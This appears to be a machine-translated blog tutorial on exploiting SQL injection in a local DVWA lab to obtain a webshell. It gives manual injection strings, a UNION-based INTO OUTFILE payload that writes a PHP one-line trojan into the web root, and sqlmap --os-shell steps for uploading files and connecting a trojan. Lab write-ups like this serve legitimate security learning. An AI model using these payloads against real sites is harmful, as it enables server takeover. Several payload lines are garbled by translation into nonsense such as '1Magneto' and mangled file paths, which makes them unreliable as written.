Shulou(Shulou.com)05/31 Report--

How to build a dvwa environment from MySql injection to GetShell, many novices are not very clear about this. In order to help you solve this problem, the following editor will explain it in detail. People with this need can come and learn. I hope you can get something.

Introduction

One day, I took my master to give you the website to help infiltrate, so after some testing, I found a violent crack, and there were some logic loopholes that were bypassed by verification. I hastily wrote the report. After a compliment, the master said that he had injected a website with paragraph C by injecting getshell. I said that I didn't find this IP when I scanned the C segment (an excuse under frustration). Then I said that if I could find this system, I would also be able to getshell, and a sentence from the master touched mine a little bit (you probably won't inject getshell through mysql).

Yes, the system on the project is filtered dozens of times a week every month, and sqlmap runs where I usually see the submitted parameters. I don't have a solid knowledge of the most basic manual injection, so I decided to know how to build the environment and learn how to get to getshell through mysql.

Through looking up the information, summed up this article, write their own mental process to share with beginners also hope to get Daniel's correction, hope that entry-level players can encourage them to create more learning environment and think more.

Build an environment

At the beginning of learning, we learned all kinds of vulnerabilities, such as sql injection, xss, file upload, etc., by building DVWA, so when we thought of how to build an environment for existing injection, we immediately had this idea in mind. The tutorials we see often only introduce how to reproduce vulnerabilities through high, medium and low security levels, so why can't we getshell through injection? So I immediately set up the environment to give it a try.

STEP 1 has the required files ready and can be downloaded for free on the Internet.

1) Xampp integrated environment

2) Dvwa package

STEP 2 Click to install and start xampp. There may be an error when opening apache. In this case, you need to change the port to an unoccupied port by modifying the config file. Here, change it to 4433 and 8081.

Extract the dvwa and put it in the htdoc directory under the xampp directory.

STEP 3 at this time the environment has been built, access and login, you can see a variety of vulnerability environment.

Reference: there is a detailed introduction to the building environment on the site and on the Internet. if you cannot build successfully in accordance with the above steps, you can search and solve the problem on your own.

Link: http://www.freebuf.com/sectool/102661.html

Vulnerability exploitation-manual

Manually inject the idea into getshell:

1) determine whether there is injection, whether the injection is character or digital

2) then use SQL statements to manipulate disk files (mysql database is very easy to read disk files, because mysql provides functions such as load_file (), if the database and the website are installed on the same server, it is easy to write to webshell).

Vulnerability exploitation

Enter 1 for STEP 1 and the query is successful

Enter 1'and'1' ='2, the query failed and the return is empty

Enter 1'or '1234' = '1234. The query is successful, indicating that there is injection.

Let's take a look at how database queries are made at the low level by looking at the source code function

We spliced the successful statement we just injected into the sql query for analysis.

The principle is actually very simple, it is judged by a conditional statement, if the conditional statement after the where is true, it can be queried, if the condition is judged to be false, it is wrong, and no results are returned. When we learned conditional statements in high school, we knew the rules when doing or operations:

STEP 2 SQL statement only union query

Most SQL queries contain only a single SELECT statement that returns data from one or more tables (for example, if we enter 1 at id, we will return a result), but SQL also allows multiple queries (multiple SELECT statements) to be executed and the results returned as a query result set. These combined queries are usually called union or compound queries. Common databases support UNION queries. It is very simple to use UNION. All you need to do is to give each SELECT statement, and then add the UNION keyword between each SELECT statement, so that the given SELECT result set can be combined into a result set and returned.

Give examples to illustrate

1) We enter 1 at id and return a result

2) enter 1 'union select 1 minute 2 queries at id, and you can see that we have executed two select queries in the database

And returned two results at the same time.

STEP 3 uses union query to execute the functions included in mysql to operate on disk files.

1) We typed 1 'union select 1Magneto' into outfile 'CVWAX xamppUnixamppUnixDVWAX. Php' # use into outfile to write a sentence to the Trojan horse, the file name is 1.php. If you find an error, find out the reason.

2) from the error message, we can see that it should be said that the single quotation mark is closed. Because I was learning python some time ago, I decided to change the single quotation mark in the Trojan horse to double quotation mark.

1 'union select 1legal quotation' into outfile 'CvwaUnix xamppUnix htdocsUnixxamppUnixxvwaUnix1.php' # (just now I didn't know that double quotation marks should be used in the single quotation marks in the sql sentence, it was torture, all kinds of single quotation marks were closed, all kinds of errors were reported, all kinds of head iron attempts, I even thought that I didn't have the authority to write to the file, mistakenly suspected life. )

3) did not report the wrong information, is it successful? Check the catalog, sure enough, have the 1.php file, hurry up on the kitchen knife (comfortable, although not as happy as the real environment, but after all it is a success)

Manual testing is over here. Tool dogs like me must find a way to solve it with tools.

Vulnerability exploitation-tools

The most common way to use sql injection is sqlmap. The person who does the penetration test has a copy. When he knows that there is sql injection, he will take it and run it.

STEP1: discover injection and implement

URL: http://127.0.0.1:8081/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#, wow X, it turned out to be a failure. Through the 302 message reported in sqlmap below, you can see that you jumped to the login interface during the test. It turned out that you need to log in to test with sqlmap.

Some operation, know to add cookie to test, successful.

STEP 2: use the os-shell parameter in sqlmap to continue the attack (- os-shell is to get an interactive shell from the injection point, which provides us with an environment to execute certain system commands, which is similar to cmd under windows).

STEP 3: choose the language according to the environment of the specific system. Dvwa uses php, so naturally choose php, and then select 2 to customize the upload location. If you want to get shell here, you must know the absolute path to the site. (the path separator\ in C:\ xampp\ htdocs\ dvwa needs to be translated by adding\ under windows).

STEP 4: you can see that os-shell has been obtained and two files in php format have been uploaded under the website directory. When we visit these two files, we can see that they have provided us with an upload point to upload Trojan files.

STEP 5: use this upload point to upload 2.php, the content is php one sentence Trojan horse (familiar with php can write, not familiar with Baidu), and then connect through a kitchen knife to get shell.

Summary

My own learning and exploration process is much more than that, because there will be a variety of problems in building the environment, including exploiting vulnerabilities, which need to be solved through constant exploration, for example, when injecting single quotes manually, even because they have suffered losses because of whether the single quotation marks are in Chinese or English, and how to close the single quotation marks. When sqlmap attacks, we need to add cookie. When you get os-shell, you need to add a backslash for translation, etc., a mistake, a solution, do not give up to settle down to solve the problem, the learning process is like this, including the usual infiltration, need to be patient to slowly explore, in the process of groping to constantly improve their skills, continue to grow, after all, Daniel is not a day to practice.

Shortcoming

1) the environment is a built environment with high permissions, no protection from firewalls, waf and other security devices, and will not be intercepted. The real environment often needs to avoid repeated protection.

2) the attack usage under linux is not mentioned in the article, because os-shell has always been a point of complaint. How much permission does the injection point have? with this permission, do I still need this operation and so on? Among them, in linux, because the problem of permissions has not been solved, so it did not make use of it successfully. At the same time, I read Daniel's article on what kind of monitoring and rebound shell is also a bit confused.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.